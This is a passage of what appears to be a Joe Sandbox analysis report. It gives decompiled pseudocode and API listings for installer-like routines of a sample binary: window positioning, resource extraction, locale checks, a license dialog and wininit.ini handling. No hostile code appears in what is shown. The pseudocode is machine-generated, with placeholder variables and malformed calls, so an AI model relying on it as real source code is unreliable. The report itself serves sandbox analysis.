                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				struct tagRECT _v24;
                                                                                                                                                                                                                                            				struct tagRECT _v40;
                                                                                                                                                                                                                                            				struct HWND__* _v44;
                                                                                                                                                                                                                                            				intOrPtr _v48;
                                                                                                                                                                                                                                            				int _v52;
                                                                                                                                                                                                                                            				intOrPtr _v56;
                                                                                                                                                                                                                                            				int _v60;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t29;
                                                                                                                                                                                                                                            				void* _t53;
                                                                                                                                                                                                                                            				intOrPtr _t56;
                                                                                                                                                                                                                                            				int _t59;
                                                                                                                                                                                                                                            				struct HWND__* _t63;
                                                                                                                                                                                                                                            				struct HWND__* _t67;
                                                                                                                                                                                                                                            				struct HWND__* _t68;
                                                                                                                                                                                                                                            				struct HDC__* _t69;
                                                                                                                                                                                                                                            				int _t72;
                                                                                                                                                                                                                                            				signed int _t74;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t63 = __edx;
                                                                                                                                                                                                                                            				_t29 =  *0x10d8004; // 0xc2f4ed82
                                                                                                                                                                                                                                            				_v8 = _t29 ^ _t74;
                                                                                                                                                                                                                                            				_t68 = __edx;
                                                                                                                                                                                                                                            				_v44 = __ecx;
                                                                                                                                                                                                                                            				GetWindowRect(__ecx,  &_v40);
                                                                                                                                                                                                                                            				_t53 = _v40.bottom - _v40.top;
                                                                                                                                                                                                                                            				_v48 = _v40.right - _v40.left;
                                                                                                                                                                                                                                            				GetWindowRect(_t68,  &_v24);
                                                                                                                                                                                                                                            				_v56 = _v24.bottom - _v24.top;
                                                                                                                                                                                                                                            				_t69 = GetDC(_v44);
                                                                                                                                                                                                                                            				_v52 = GetDeviceCaps(_t69, 8);
                                                                                                                                                                                                                                            				_v60 = GetDeviceCaps(_t69, 0xa);
                                                                                                                                                                                                                                            				ReleaseDC(_v44, _t69);
                                                                                                                                                                                                                                            				_t56 = _v48;
                                                                                                                                                                                                                                            				asm("cdq");
                                                                                                                                                                                                                                            				_t72 = (_v24.right - _v24.left - _t56 - _t63 >> 1) + _v24.left;
                                                                                                                                                                                                                                            				_t67 = 0;
                                                                                                                                                                                                                                            				if(_t72 >= 0) {
                                                                                                                                                                                                                                            					_t63 = _v52;
                                                                                                                                                                                                                                            					if(_t72 + _t56 > _t63) {
                                                                                                                                                                                                                                            						_t72 = _t63 - _t56;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					_t72 = _t67;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				asm("cdq");
                                                                                                                                                                                                                                            				_t59 = (_v56 - _t53 - _t63 >> 1) + _v24.top;
                                                                                                                                                                                                                                            				if(_t59 >= 0) {
                                                                                                                                                                                                                                            					_t63 = _v60;
                                                                                                                                                                                                                                            					if(_t59 + _t53 > _t63) {
                                                                                                                                                                                                                                            						_t59 = _t63 - _t53;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					_t59 = _t67;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return E010D6CE0(SetWindowPos(_v44, _t67, _t72, _t59, _t67, _t67, 5), _t53, _v8 ^ _t74, _t63, _t67, _t72);
                                                                                                                                                                                                                                            			}

























                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetWindowRect.USER32(?,?), ref: 010D43F1
                                                                                                                                                                                                                                            • GetWindowRect.USER32(00000000,?), ref: 010D440B
                                                                                                                                                                                                                                            • GetDC.USER32(?), ref: 010D4423
                                                                                                                                                                                                                                            • GetDeviceCaps.GDI32(00000000,00000008), ref: 010D442E
                                                                                                                                                                                                                                            • GetDeviceCaps.GDI32(00000000,0000000A), ref: 010D443A
                                                                                                                                                                                                                                            • ReleaseDC.USER32(?,00000000), ref: 010D4447
                                                                                                                                                                                                                                            • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,00000005,?,?), ref: 010D44A2
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.338526724.00000000010D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 010D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338519106.00000000010D0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338553666.00000000010D8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_10d0000_sMt14vz.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Window$CapsDeviceRect$Release
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2212493051-0
                                                                                                                                                                                                                                            • Opcode ID: a33d349861f8dd773c7d2e40bd2adca0baafa087f95f1b9ec30c6bdf644cb6a2
                                                                                                                                                                                                                                            • Instruction ID: a39bc5c6ce436d90c1c018c0fc32957bfef0124b8f8d874e0ab644b788be2fe8
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a33d349861f8dd773c7d2e40bd2adca0baafa087f95f1b9ec30c6bdf644cb6a2
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D0314C36F01219AFCB14CFB8D9889EEBBB5EB89310F154169F845F3244DA35AD45CBA0
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 53%
                                                                                                                                                                                                                                            			E010D6298(intOrPtr __ecx, intOrPtr* __edx) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v28;
                                                                                                                                                                                                                                            				intOrPtr _v32;
                                                                                                                                                                                                                                            				struct HINSTANCE__* _v36;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t16;
                                                                                                                                                                                                                                            				struct HRSRC__* _t21;
                                                                                                                                                                                                                                            				intOrPtr _t26;
                                                                                                                                                                                                                                            				void* _t30;
                                                                                                                                                                                                                                            				struct HINSTANCE__* _t36;
                                                                                                                                                                                                                                            				intOrPtr* _t40;
                                                                                                                                                                                                                                            				void* _t41;
                                                                                                                                                                                                                                            				intOrPtr* _t44;
                                                                                                                                                                                                                                            				intOrPtr* _t45;
                                                                                                                                                                                                                                            				void* _t47;
                                                                                                                                                                                                                                            				signed int _t50;
                                                                                                                                                                                                                                            				struct HINSTANCE__* _t51;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t44 = __edx;
                                                                                                                                                                                                                                            				_t16 =  *0x10d8004; // 0xc2f4ed82
                                                                                                                                                                                                                                            				_v8 = _t16 ^ _t50;
                                                                                                                                                                                                                                            				_t46 = 0;
                                                                                                                                                                                                                                            				_v32 = __ecx;
                                                                                                                                                                                                                                            				_v36 = 0;
                                                                                                                                                                                                                                            				_t36 = 1;
                                                                                                                                                                                                                                            				E010D171E( &_v28, 0x14, "UPDFILE%lu", 0);
                                                                                                                                                                                                                                            				while(1) {
                                                                                                                                                                                                                                            					_t51 = _t51 + 0x10;
                                                                                                                                                                                                                                            					_t21 = FindResourceA(_t46,  &_v28, 0xa);
                                                                                                                                                                                                                                            					if(_t21 == 0) {
                                                                                                                                                                                                                                            						break;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_t45 = LockResource(LoadResource(_t46, _t21));
                                                                                                                                                                                                                                            					if(_t45 == 0) {
                                                                                                                                                                                                                                            						 *0x10d9124 = 0x80070714;
                                                                                                                                                                                                                                            						_t36 = _t46;
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						_t5 = _t45 + 8; // 0x8
                                                                                                                                                                                                                                            						_t44 = _t5;
                                                                                                                                                                                                                                            						_t40 = _t44;
                                                                                                                                                                                                                                            						_t6 = _t40 + 1; // 0x9
                                                                                                                                                                                                                                            						_t47 = _t6;
                                                                                                                                                                                                                                            						do {
                                                                                                                                                                                                                                            							_t26 =  *_t40;
                                                                                                                                                                                                                                            							_t40 = _t40 + 1;
                                                                                                                                                                                                                                            						} while (_t26 != 0);
                                                                                                                                                                                                                                            						_t41 = _t40 - _t47;
                                                                                                                                                                                                                                            						_t46 = _t51;
                                                                                                                                                                                                                                            						_t7 = _t41 + 1; // 0xa
                                                                                                                                                                                                                                            						 *0x10da288( *_t45,  *((intOrPtr*)(_t45 + 4)), _t44, _t7 + _t44);
                                                                                                                                                                                                                                            						_t30 = _v32();
                                                                                                                                                                                                                                            						if(_t51 != _t51) {
                                                                                                                                                                                                                                            							asm("int 0x29");
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_push(_t45);
                                                                                                                                                                                                                                            						if(_t30 == 0) {
                                                                                                                                                                                                                                            							_t36 = 0;
                                                                                                                                                                                                                                            							FreeResource(??);
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							FreeResource();
                                                                                                                                                                                                                                            							_v36 = _v36 + 1;
                                                                                                                                                                                                                                            							E010D171E( &_v28, 0x14, "UPDFILE%lu", _v36 + 1);
                                                                                                                                                                                                                                            							_t46 = 0;
                                                                                                                                                                                                                                            							continue;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					L12:
                                                                                                                                                                                                                                            					return E010D6CE0(_t36, _t36, _v8 ^ _t50, _t44, _t45, _t46);
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				goto L12;
                                                                                                                                                                                                                                            			}























                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 010D171E: _vsnprintf.MSVCRT ref: 010D1750
                                                                                                                                                                                                                                            • LoadResource.KERNEL32(00000000,00000000,?,?,00000002,00000000,?,010D51CA,00000004,00000024,010D2F71,?,00000002,00000000), ref: 010D62CD
                                                                                                                                                                                                                                            • LockResource.KERNEL32(00000000,?,?,00000002,00000000,?,010D51CA,00000004,00000024,010D2F71,?,00000002,00000000), ref: 010D62D4
                                                                                                                                                                                                                                            • FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,010D51CA,00000004,00000024,010D2F71,?,00000002,00000000), ref: 010D631B
                                                                                                                                                                                                                                            • FindResourceA.KERNEL32(00000000,00000004,0000000A), ref: 010D6345
                                                                                                                                                                                                                                            • FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,010D51CA,00000004,00000024,010D2F71,?,00000002,00000000), ref: 010D6357
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.338526724.00000000010D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 010D0000, based on PE: true
• Associated: 00000002.00000002.338519106.00000000010D0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.338553666.00000000010D8000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.338572992.00000000010DA000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.338572992.00000000010DC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_10d0000_sMt14vz.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Resource$Free$FindLoadLock_vsnprintf
                                                                                                                                                                                                                                            • String ID: UPDFILE%lu
                                                                                                                                                                                                                                            • API String ID: 2922116661-2329316264
                                                                                                                                                                                                                                            • Opcode ID: 5b8f3b9528e3a6f45a81d147806e22adb3b97cc454c0e9938dd83829476ec852
                                                                                                                                                                                                                                            • Instruction ID: eafcae948d7a83224712c047b25765c22b6ee6561c54dea6767eddbb8e272d05
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5b8f3b9528e3a6f45a81d147806e22adb3b97cc454c0e9938dd83829476ec852
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1021B175A01319ABDB209FA5DC459FEBB78FF49714B004159FA82A3201DB3B99028BE0
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 94%
                                                                                                                                                                                                                                            			E010D681F(void* __ebx) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v20;
                                                                                                                                                                                                                                            				struct _OSVERSIONINFOA _v168;
                                                                                                                                                                                                                                            				void* _v172;
                                                                                                                                                                                                                                            				int* _v176;
                                                                                                                                                                                                                                            				int _v180;
                                                                                                                                                                                                                                            				int _v184;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t19;
                                                                                                                                                                                                                                            				long _t31;
                                                                                                                                                                                                                                            				signed int _t35;
                                                                                                                                                                                                                                            				void* _t36;
                                                                                                                                                                                                                                            				intOrPtr _t41;
                                                                                                                                                                                                                                            				signed int _t44;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t36 = __ebx;
                                                                                                                                                                                                                                            				_t19 =  *0x10d8004; // 0xc2f4ed82
                                                                                                                                                                                                                                            				_v8 = _t19 ^ _t44;
                                                                                                                                                                                                                                            				_t41 =  *0x10d81d8; // 0xfffffffe
                                                                                                                                                                                                                                            				_t43 = 0;
                                                                                                                                                                                                                                            				_v180 = 0xc;
                                                                                                                                                                                                                                            				_v176 = 0;
                                                                                                                                                                                                                                            				if(_t41 == 0xfffffffe) {
                                                                                                                                                                                                                                            					 *0x10d81d8 = 0;
                                                                                                                                                                                                                                            					_v168.dwOSVersionInfoSize = 0x94;
                                                                                                                                                                                                                                            					if(GetVersionExA( &_v168) == 0) {
                                                                                                                                                                                                                                            						L12:
                                                                                                                                                                                                                                            						_t41 =  *0x10d81d8; // 0xfffffffe
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						_t41 = 1;
                                                                                                                                                                                                                                            						if(_v168.dwPlatformId != 1 || _v168.dwMajorVersion != 4 || _v168.dwMinorVersion >= 0xa || GetSystemMetrics(0x4a) == 0 || RegOpenKeyExA(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x20019,  &_v172) != 0) {
                                                                                                                                                                                                                                            							goto L12;
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							_t31 = RegQueryValueExA(_v172, 0x10d1140, 0,  &_v184,  &_v20,  &_v180);
                                                                                                                                                                                                                                            							_t43 = _t31;
                                                                                                                                                                                                                                            							RegCloseKey(_v172);
                                                                                                                                                                                                                                            							if(_t31 != 0) {
                                                                                                                                                                                                                                            								goto L12;
                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                            								_t40 =  &_v176;
                                                                                                                                                                                                                                            								if(E010D66F9( &_v20,  &_v176) == 0) {
                                                                                                                                                                                                                                            									goto L12;
                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                            									_t35 = _v176 & 0x000003ff;
                                                                                                                                                                                                                                            									if(_t35 == 1 || _t35 == 0xd) {
                                                                                                                                                                                                                                            										 *0x10d81d8 = _t41;
                                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                                            										goto L12;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return E010D6CE0(_t41, _t36, _v8 ^ _t44, _t40, _t41, _t43);
                                                                                                                                                                                                                                            			}



















                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetVersionExA.KERNEL32(?,00000000,00000002), ref: 010D686E
                                                                                                                                                                                                                                            • GetSystemMetrics.USER32(0000004A), ref: 010D68A7
                                                                                                                                                                                                                                            • RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 010D68CC
                                                                                                                                                                                                                                            • RegQueryValueExA.ADVAPI32(?,010D1140,00000000,?,?,0000000C), ref: 010D68F4
                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 010D6902
                                                                                                                                                                                                                                              • Part of subcall function 010D66F9: CharNextA.USER32(?,00000001,00000000,00000000,?,?,?,010D691A), ref: 010D6741
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            • Control Panel\Desktop\ResourceLocale, xrefs: 010D68C2
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.338526724.00000000010D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 010D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338519106.00000000010D0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338553666.00000000010D8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_10d0000_sMt14vz.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CharCloseMetricsNextOpenQuerySystemValueVersion
                                                                                                                                                                                                                                            • String ID: Control Panel\Desktop\ResourceLocale
                                                                                                                                                                                                                                            • API String ID: 3346862599-1109908249
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                            			E010D3A3F(void* __eflags) {
                                                                                                                                                                                                                                            				void* _t3;
                                                                                                                                                                                                                                            				void* _t9;
                                                                                                                                                                                                                                            				CHAR* _t16;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t16 = "LICENSE";
                                                                                                                                                                                                                                            				_t1 = E010D468F(_t16, 0, 0) + 1; // 0x1
                                                                                                                                                                                                                                            				_t3 = LocalAlloc(0x40, _t1);
                                                                                                                                                                                                                                            				 *0x10d8d4c = _t3;
                                                                                                                                                                                                                                            				if(_t3 != 0) {
                                                                                                                                                                                                                                            					_t19 = _t16;
                                                                                                                                                                                                                                            					if(E010D468F(_t16, _t3, _t28) != 0) {
                                                                                                                                                                                                                                            						if(lstrcmpA( *0x10d8d4c, "<None>") == 0) {
                                                                                                                                                                                                                                            							LocalFree( *0x10d8d4c);
                                                                                                                                                                                                                                            							L9:
                                                                                                                                                                                                                                            							 *0x10d9124 = 0;
                                                                                                                                                                                                                                            							return 1;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t9 = E010D6517(_t19, 0x7d1, 0, E010D3100, 0, 0);
                                                                                                                                                                                                                                            						LocalFree( *0x10d8d4c);
                                                                                                                                                                                                                                            						if(_t9 != 0) {
                                                                                                                                                                                                                                            							goto L9;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						 *0x10d9124 = 0x800704c7;
                                                                                                                                                                                                                                            						L2:
                                                                                                                                                                                                                                            						return 0;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					E010D44B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            					LocalFree( *0x10d8d4c);
                                                                                                                                                                                                                                            					 *0x10d9124 = 0x80070714;
                                                                                                                                                                                                                                            					goto L2;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				E010D44B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            				 *0x10d9124 = E010D6285();
                                                                                                                                                                                                                                            				goto L2;
                                                                                                                                                                                                                                            			}







                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 010D468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010D46A0
                                                                                                                                                                                                                                              • Part of subcall function 010D468F: SizeofResource.KERNEL32(00000000,00000000,?,010D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010D46A9
                                                                                                                                                                                                                                              • Part of subcall function 010D468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010D46C3
                                                                                                                                                                                                                                              • Part of subcall function 010D468F: LoadResource.KERNEL32(00000000,00000000,?,010D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010D46CC
                                                                                                                                                                                                                                              • Part of subcall function 010D468F: LockResource.KERNEL32(00000000,?,010D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010D46D3
                                                                                                                                                                                                                                              • Part of subcall function 010D468F: memcpy_s.MSVCRT ref: 010D46E5
                                                                                                                                                                                                                                              • Part of subcall function 010D468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 010D46EF
                                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,010D2F64,?,00000002,00000000), ref: 010D3A5D
                                                                                                                                                                                                                                            • LocalFree.KERNEL32(00000000,00000000,00000010,00000000,00000000), ref: 010D3AB3
                                                                                                                                                                                                                                              • Part of subcall function 010D44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 010D4518
                                                                                                                                                                                                                                              • Part of subcall function 010D44B9: MessageBoxA.USER32(?,?,010D9154,00010010), ref: 010D4554
                                                                                                                                                                                                                                              • Part of subcall function 010D6285: GetLastError.KERNEL32(010D5BBC), ref: 010D6285
                                                                                                                                                                                                                                            • lstrcmpA.KERNEL32(<None>,00000000), ref: 010D3AD0
                                                                                                                                                                                                                                            • LocalFree.KERNEL32 ref: 010D3B13
                                                                                                                                                                                                                                              • Part of subcall function 010D6517: FindResourceA.KERNEL32(?,000007D6,00000005), ref: 010D652A
                                                                                                                                                                                                                                              • Part of subcall function 010D6517: LoadResource.KERNEL32(?,00000000,?,?,010D2EE8,00000000,010D19E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 010D6538
                                                                                                                                                                                                                                              • Part of subcall function 010D6517: DialogBoxIndirectParamA.USER32(?,00000000,00000547,010D19E0,00000000), ref: 010D6557
                                                                                                                                                                                                                                              • Part of subcall function 010D6517: FreeResource.KERNEL32(00000000,?,?,010D2EE8,00000000,010D19E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 010D6560
                                                                                                                                                                                                                                            • LocalFree.KERNEL32(00000000,010D3100,00000000,00000000), ref: 010D3AF4
                                                                                                                                                                                                                                            Strings
Memory Dump Source
• Source File: 00000002.00000002.338526724.00000000010D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 010D0000, based on PE: true
• Associated: 00000002.00000002.338519106.00000000010D0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.338553666.00000000010D8000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.338572992.00000000010DA000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.338572992.00000000010DC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_10d0000_sMt14vz.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Resource$Free$Local$FindLoad$AllocDialogErrorIndirectLastLockMessageParamSizeofStringlstrcmpmemcpy_s
                                                                                                                                                                                                                                            • String ID: <None>$LICENSE
                                                                                                                                                                                                                                            • API String ID: 2414642746-383193767
                                                                                                                                                                                                                                            • Opcode ID: ff89d49b2123b624564249f13ae596b4a9ea1d06d5522cd3a10469d01ce8c5a6
                                                                                                                                                                                                                                            • Instruction ID: 4dd91eac1c6de813060fe98d8434212d624c28c95947da7688c0a5efd10f17b9
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ff89d49b2123b624564249f13ae596b4a9ea1d06d5522cd3a10469d01ce8c5a6
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D2118774702301ABD7346F7A9C09E5B3AF9EBD5750B00442EBDC5DA598DA7F88008765
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 94%
                                                                                                                                                                                                                                            			E010D24E0(void* __ebx) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v268;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t7;
                                                                                                                                                                                                                                            				void* _t20;
                                                                                                                                                                                                                                            				long _t26;
                                                                                                                                                                                                                                            				signed int _t27;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t20 = __ebx;
                                                                                                                                                                                                                                            				_t7 =  *0x10d8004; // 0xc2f4ed82
                                                                                                                                                                                                                                            				_v8 = _t7 ^ _t27;
                                                                                                                                                                                                                                            				_t25 = 0x104;
                                                                                                                                                                                                                                            				_t26 = 0;
                                                                                                                                                                                                                                            				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
                                                                                                                                                                                                                                            					E010D658A( &_v268, 0x104, "wininit.ini");
                                                                                                                                                                                                                                            					WritePrivateProfileStringA(0, 0, 0,  &_v268);
                                                                                                                                                                                                                                            					_t25 = _lopen( &_v268, 0x40);
                                                                                                                                                                                                                                            					if(_t25 != 0xffffffff) {
                                                                                                                                                                                                                                            						_t26 = _llseek(_t25, 0, 2);
                                                                                                                                                                                                                                            						_lclose(_t25);
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return E010D6CE0(_t26, _t20, _v8 ^ _t27, 0x104, _t25, _t26);
                                                                                                                                                                                                                                            			}












                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetWindowsDirectoryA.KERNEL32(?,00000104,00000000,00000000), ref: 010D2506
                                                                                                                                                                                                                                            • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,?), ref: 010D252C
                                                                                                                                                                                                                                            • _lopen.KERNEL32(?,00000040), ref: 010D253B
                                                                                                                                                                                                                                            • _llseek.KERNEL32(00000000,00000000,00000002), ref: 010D254C
                                                                                                                                                                                                                                            • _lclose.KERNEL32(00000000), ref: 010D2555
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.338526724.00000000010D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 010D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338519106.00000000010D0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338553666.00000000010D8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_10d0000_sMt14vz.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: DirectoryPrivateProfileStringWindowsWrite_lclose_llseek_lopen
                                                                                                                                                                                                                                            • String ID: wininit.ini
                                                                                                                                                                                                                                            • API String ID: 3273605193-4206010578
                                                                                                                                                                                                                                            • Opcode ID: 2d000250fcac8232e402b08febc167d1b3bc335904bf92b82dba539bf00b14c5
                                                                                                                                                                                                                                            • Instruction ID: a2bd71e73a5d6698a95c03ab6920b2123968415a0a55d991d4d4ac23e9b9c915
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2d000250fcac8232e402b08febc167d1b3bc335904bf92b82dba539bf00b14c5
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 28015232701218A7D7309A699C08EEB7FBCDB55750F440195FA89D3184DA798A458BA0
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                            			E010D3450(struct HWND__* _a4, intOrPtr _a8, int _a12) {
                                                                                                                                                                                                                                            				void* _t7;
                                                                                                                                                                                                                                            				void* _t11;
                                                                                                                                                                                                                                            				struct HWND__* _t12;
                                                                                                                                                                                                                                            				int _t22;
                                                                                                                                                                                                                                            				struct HWND__* _t24;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t7 = _a8 - 0x10;
                                                                                                                                                                                                                                            				if(_t7 == 0) {
                                                                                                                                                                                                                                            					EndDialog(_a4, 2);
                                                                                                                                                                                                                                            					L11:
                                                                                                                                                                                                                                            					return 1;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t11 = _t7 - 0x100;
                                                                                                                                                                                                                                            				if(_t11 == 0) {
                                                                                                                                                                                                                                            					_t12 = GetDesktopWindow();
                                                                                                                                                                                                                                            					_t24 = _a4;
                                                                                                                                                                                                                                            					E010D43D0(_t24, _t12);
